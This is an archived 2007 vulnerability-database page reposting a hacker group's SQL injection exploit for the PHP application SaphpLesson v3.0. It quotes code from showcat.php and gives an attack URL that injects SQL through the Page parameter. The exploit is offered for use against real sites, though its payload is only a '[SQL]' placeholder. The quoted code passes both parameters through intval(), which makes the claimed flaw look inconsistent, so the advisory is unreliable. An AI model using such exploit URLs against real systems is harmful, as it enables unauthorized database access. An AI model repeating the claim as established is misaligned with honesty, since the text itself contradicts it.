Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16150
HistoryFeb 22, 2007 - 12:00 a.m.

SaphpLesson v3.0 SQL Injection Exploit

2007-02-2200:00:00
vulners.com
101

//////////////////2007/////////////////////
//SaphpLesson v3.0 SQL Injection Exploit//
//////////////////////////////////////////
################################
Found by:SwEET-DeViL&HaCKeR sUn#
TeaM AL-GaRNi------------------#
Application : SaphpLesson------#
version : v3.0-----------------#
URL : No-----------------------#
################################

Line 19'/'23 of showcat.php ||
---------------<? ||
$forumid = intval($_GET["forumid"]); ||
||
$Page = intval($_GET["Page"]); ||
||
$tit = mysql_query("select Title,CatID from forums where id=$forumid"); ||
?>-----------------------------------------------------------------------------

ExploiTs :-
""""""""""
http://www.Site.com/Path/showcat.php?forumid=1&amp;Page=-1[SQL]&#41;;#

/'''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''/
END
K-S-A___
|ЬЬЬЬЬЬTeam AL-GaRNiЬЬЬЬЬЬЬЬЬЬЬ|
:::::::::::::::::::::::::::::::::
::-###########-----###########-::
::-###########-----###########-::
::-###-------------###-----###-::
::-###-------------###########-::
::-###—######----###########-::
::-###—##-###----###–###----::
::-###------###----###—###—::
::-############----###----###–::
::-############----###----###–::
:::::::::::::::::::::::::::::::::
|ЬЬЬЬЬ[email protected]ЬЬЬЬЬЬЬ|
|ЬЬЬЬЬЬЬЬЬ[email protected]ЬЬЬЬЬЬЬЬЬ|